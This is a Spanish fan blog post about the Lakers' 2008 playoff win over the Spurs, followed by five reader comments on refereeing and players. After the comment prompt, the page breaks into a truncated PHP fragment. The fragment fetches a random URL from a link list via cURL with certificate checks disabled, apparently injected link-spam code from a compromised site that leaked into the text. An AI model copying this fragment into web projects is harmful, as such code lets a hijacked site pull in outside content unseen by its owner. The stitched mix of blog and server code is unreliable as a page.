Diario laker: 5 to go!

28 de May de 2008 por MagicJohnson32

Pensamientos desde el 1.111 de South Figueroa Street, antiguo 3.900 de West Manchester Boulevard.

Qué rabia da no tener tiempo de escribir sobre la victoria de anoche en San Antonio, 93-91, en un partido emotivo, con más luces que sombras, de los que merecen ser revisados en vídeo. Qué pena que no pueda reconocer que adoro este equipo, haga lo que haga esta temporada, incluso si pierde tres partidos consecutivos contra los Spurs y no alcanza las finales. Es horrible no disponer de un minuto para recordaros, por si no habíais caído, que estos Lakers (los más divertidos y disfrutables desde el Showtime, sin ninguna duda) están a 5 victorias de lograr el anillo. Unos Lakers, por si no os habíais fijado, en el que sólo Fisher (y el gran Ira Newble) supera la treintena y que son una plantilla de larguísimo recorrido, desde luego mucho más que los otros tres equipos supervivientes.kobeoverbowen

Me sabe fatal no reconoceros que me emocionó la reacción de Odom en los últimos minutos de partido, cuando por fin supo reconducir un partido plagado de frustraciones y faltas, en motivación para ser agresivo y desequilibrante. E insistir en la grandeza de Bryant, que cometió un error de bulto y, sin embargo, dejó un partido memorable: desequilibró en prácticamente cada ocasión en la que los Spurs se acercaban en el marcador y silenció, una vez tras otra, el estruendoso at&t Center. Y me quedo con las ganas de desahogarme con el tema de las faltas a Kobe, que ayer realizó 29 lanzamientos a canasta y no fue a la línea ni una sola vez (van 6 tiros libres en 160 minutos de juego contra los Spurs).

También, si tuviese tiempo, comentaría el desastre arbitral en el tramo final, primero al anular un tapón legal de Odom a Parker, después al no ver que el tiro forzado de Fisher rozó el aro y dejar sólo 2 segundos de posesión a los Lakers con 5 por disputarse y, por último, en la falta del propio Fisher sobre Barry en la acción final y que habría dado dos tiros libres a los locales a apenas unas décimas para la conclusión.

Sí, una auténtica pena…

Comenta

5 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Si pudiera yo también suscribiría punto por punto lo que has dicho… pero en ese caso me acusarían más todavía de ser una de tus personalidades…

    Para evitarlo te diré que Bryant insiste mucho en el tiro y que por ese motivo apenas hay posibilidad de sacar faltas.
    A excepción del apestoso piececito de los coj.. no he visto jugadas escandalosas en contra de Bryant.

    Lo que sí me ha parecido es que a alguno de los Spurs sacan falta apenas rozándolos.

    PD: Lo del arbitraje… increíble que todavía se insista en lo de “la final soñada”

      Citar

  2. TheDeerHunter dice:
    #2

    ¿se puede poner publicidad???

    el jueves, a las 2:40h partidassooo en abierto!!!!

    LAKERS GO!!! ESTE AÑO SÍIII

      Citar

  3. Viva_Dirk dice:
    #3

    Vaya rémora este Odom, falla el los 2 tiros libres que falló Gasol y os tirais todo el año hablando de que no tiene caracter.

      Citar

  4. TheDeerHunter dice:
    #4

    Yo no creo que aquí se trate ser de papá o de mamá…

    a mí Gasol&Odom me encantan… estoy de acuerdo con que hay que darles algún tironcillo de orejas cuando se lo merecen.
    En este caso, lo de ayer de los 2 tiros libres finales es para hacerselo mirar… aunque añadiría que si hubiera podido tirar los que debería en estos playoffs, igual le hubieran pillado un poco más entrenado…

      Citar

  5. Gallis dice:
    #5

    Que grande, socio! Y Deer, no te preocupes por lo de las personalidades. Imagino que como yo, serás un actor contratado por magic, jajajajaja…

    Coincido en que no hay acciones escandalosas contra Bryant, pero vamos, hay al menos 4 ó 5 penetraciones en las que Bowen le golpea constantemente…y como dices, a veces mirar a Duncan basta para señalar falta.

    Lo de Odom y Gasol es más o menos como dice Deer. Cuando se lo merecen, se les critica…y Odom se lo ha merecido muchísimas veces. Y justo ahora acabo de dejar un comentario en la crónica criticando a Gasol por los tiros libres y diciendo que el partido de ayer de Odom es de Chapeau…sus Playoffs están siendo, en general, muy buenos, y por eso nadie le critica…eso no borra toda su trayectoria, pero es que eso ahora no importa, jejejeje…

    Pero vamos, el resumen es lo primero que dice mi socio…aunque nos pasen por encima 3 veces consecutivas y nos vayamos a la calle, lo de este año es sublime…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>